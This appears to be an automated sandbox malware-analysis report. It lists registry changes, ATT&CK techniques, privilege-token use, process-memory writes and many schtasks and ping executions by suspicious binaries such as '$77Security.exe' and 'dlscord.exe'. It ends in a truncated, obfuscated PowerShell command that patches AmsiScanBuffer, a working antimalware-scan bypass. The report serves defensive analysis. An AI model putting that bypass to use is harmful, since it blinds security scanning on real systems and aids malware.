Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 08 Jan 2025 13:32:47 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736343166"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={AFFC60BB-A5D1-4221-B940-35474D23C2B6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2253712635-4068079004-3870069674-1000\{94367CA5-1742-4EB4-AE07-5B801FF60CF7}	msedge.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
1560	PING.EXE
4020	PING.EXE
4332	PING.EXE
1680	PING.EXE
4772	PING.EXE
4664	PING.EXE
1600	PING.EXE
872	PING.EXE
2100	PING.EXE
2880	PING.EXE
4072	PING.EXE
3528	PING.EXE
3800	PING.EXE
2016	PING.EXE
2772	PING.EXE
1056	PING.EXE
424	PING.EXE
2240	PING.EXE
1164	PING.EXE
588	PING.EXE
3876	PING.EXE
2440	PING.EXE
1056	PING.EXE
1488	PING.EXE
652	PING.EXE
1052	PING.EXE
956	PING.EXE
5052	PING.EXE
4184	PING.EXE
4140	PING.EXE
2216	PING.EXE
2504	PING.EXE
3176	PING.EXE
3384	PING.EXE
4304	PING.EXE
4852	PING.EXE
3448	PING.EXE
952	PING.EXE
4688	PING.EXE
1968	PING.EXE
2584	PING.EXE
4024	PING.EXE
764	PING.EXE
1012	PING.EXE
5028	PING.EXE
2936	PING.EXE
4808	PING.EXE
4492	PING.EXE
5056	Process not Found
1556	PING.EXE
4768	PING.EXE
4020	PING.EXE
4216	PING.EXE
3496	PING.EXE
952	PING.EXE
2232	PING.EXE
2880	PING.EXE
3112	Process not Found
1396	PING.EXE
1064	PING.EXE
5012	PING.EXE
4236	PING.EXE
4764	PING.EXE
1972	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4204	schtasks.exe
5048	schtasks.exe
2040	schtasks.exe
2392	schtasks.exe
2456	schtasks.exe
2532	schtasks.exe
1536	schtasks.exe
3928	schtasks.exe
5036	schtasks.exe
1048	schtasks.exe
2172	Process not Found
4768	schtasks.exe
1572	schtasks.exe
2864	schtasks.exe
1832	schtasks.exe
1840	schtasks.exe
2216	schtasks.exe
3096	schtasks.exe
2636	schtasks.exe
3528	schtasks.exe
4616	schtasks.exe
5080	Process not Found
1536	schtasks.exe
4732	schtasks.exe
4644	schtasks.exe
2876	schtasks.exe
1908	schtasks.exe
1156	schtasks.exe
1656	schtasks.exe
1360	schtasks.exe
2008	schtasks.exe
4688	schtasks.exe
1288	schtasks.exe
1860	schtasks.exe
408	schtasks.exe
1744	schtasks.exe
764	schtasks.exe
5048	schtasks.exe
952	schtasks.exe
4484	Process not Found
4072	schtasks.exe
1396	schtasks.exe
2216	schtasks.exe
5064	schtasks.exe
1620	schtasks.exe
4672	schtasks.exe
1884	schtasks.exe
3208	schtasks.exe
2844	Process not Found
4828	schtasks.exe
2920	schtasks.exe
1224	schtasks.exe
2152	schtasks.exe
3324	schtasks.exe
4788	Process not Found
4576	Process not Found
4612	Process not Found
1360	schtasks.exe
2420	schtasks.exe
5032	schtasks.exe
3536	schtasks.exe
1012	schtasks.exe
2848	schtasks.exe
3984	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1760	msedge.exe
1760	msedge.exe
3656	msedge.exe
3656	msedge.exe
4884	msedge.exe
4884	msedge.exe
1092	identity_helper.exe
1092	identity_helper.exe
3712	powershell.EXE
3712	powershell.EXE
3712	powershell.EXE
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe
1540	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2088	conhost.exe
2516	dlscord.exe
3184	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1456	4363463463464363463463463.exe
Token: SeDebugPrivilege	2980	$77Security.exe
Token: SeDebugPrivilege	3712	powershell.EXE
Token: SeDebugPrivilege	3712	powershell.EXE
Token: SeDebugPrivilege	1540	dllhost.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	4012	$77Security.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	4596	client.exe
Token: SeDebugPrivilege	2088	conhost.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: 33	2088	conhost.exe
Token: SeIncBasePriorityPrivilege	2088	conhost.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: 33	2088	conhost.exe
Token: SeIncBasePriorityPrivilege	2088	conhost.exe
Token: 33	2088	conhost.exe
Token: SeIncBasePriorityPrivilege	2088	conhost.exe
Token: SeDebugPrivilege	2752	$77Security.exe
Token: 33	2088	conhost.exe
Token: SeIncBasePriorityPrivilege	2088	conhost.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	3172	Client-built.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	3504	RuntimeBroker.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeDebugPrivilege	1412	sru.exe
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE
Token: SeShutdownPrivilege	3184	Explorer.EXE
Token: SeCreatePagefilePrivilege	3184	Explorer.EXE

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
2056	chrome.exe
2056	chrome.exe
564	msedge.exe
3580	Process not Found

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3656	msedge.exe
3580	Process not Found

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1184	Process not Found
3580	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
4824	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3656 wrote to memory of 3496	3656	msedge.exe	81
PID 3656 wrote to memory of 3496	3656	msedge.exe	81
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 3332	3656	msedge.exe	82
PID 3656 wrote to memory of 1760	3656	msedge.exe	83
PID 3656 wrote to memory of 1760	3656	msedge.exe	83
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84
PID 3656 wrote to memory of 4020	3656	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4992	Process not Found
2232	Process not Found
2548	Process not Found

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:460
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b96e058e-8992-438e-819d-dcbb35ff671f}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1540

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KxGZSpPGsjSk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$txhMbTnJaCqLUH,[Parameter(Position=1)][Type]$awonvsNhRA)$qstkvWxSdII=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+'d'+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qstkvWxSdII.DefineConstructor('RT'+[Char](83)+''+[Char](112)+'e'+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$txhMbTnJaCqLUH).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+'ed');$qstkvWxSdII.DefineMethod(''+'I'+'n'+[Char](118)+'o'+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+',N'+[Char](101)+''+'w'+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'Vir'+[Char](116)+'u'+[Char](97)+''+'l'+'',$awonvsNhRA,$txhMbTnJaCqLUH).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $qstkvWxSdII.CreateType();}$fvosBZElrLxel=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'te'+'m'+''+[Char](46)+''+'d'+''+'l'+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Na'+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$kNaWNUcJRPKPmZ=$fvosBZElrLxel.GetMethod(''+[Char](71)+''+'e'+'tP'+'r'+'o'+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bumMsisafKVAaWpDjsd=KxGZSpPGsjSk @([String])([IntPtr]);$CiZGXADugUxJZaEEkTgvJO=KxGZSpPGsjSk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ulQfpzaPSdy=$fvosBZElrLxel.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.'+'d'+''+[Char](108)+''+'l'+'')));$vvghEwDRFnXGZl=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$ulQfpzaPSdy,[Object](''+[Char](76)+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$WLjfyPlDfzVZbpOpw=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$ulQfpzaPSdy,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$hgCoZob=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vvghEwDRFnXGZl,$bumMsisafKVAaWpDjsd).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+'l'+''+'l'+'');$SVXxgADZxVsniWQAc=$kNaWNUcJRPKPmZ.Invoke($Null,@([Object]$hgCoZob,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+'B'+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$giLXTHeGsW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WLjfyPlDfzVZbpOpw,$CiZGXADugUxJZaEEkTgvJO).Invoke($SVXxgADZxVsniWQAc,[uint32]8,4,[ref]$giLXTHeGsW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SV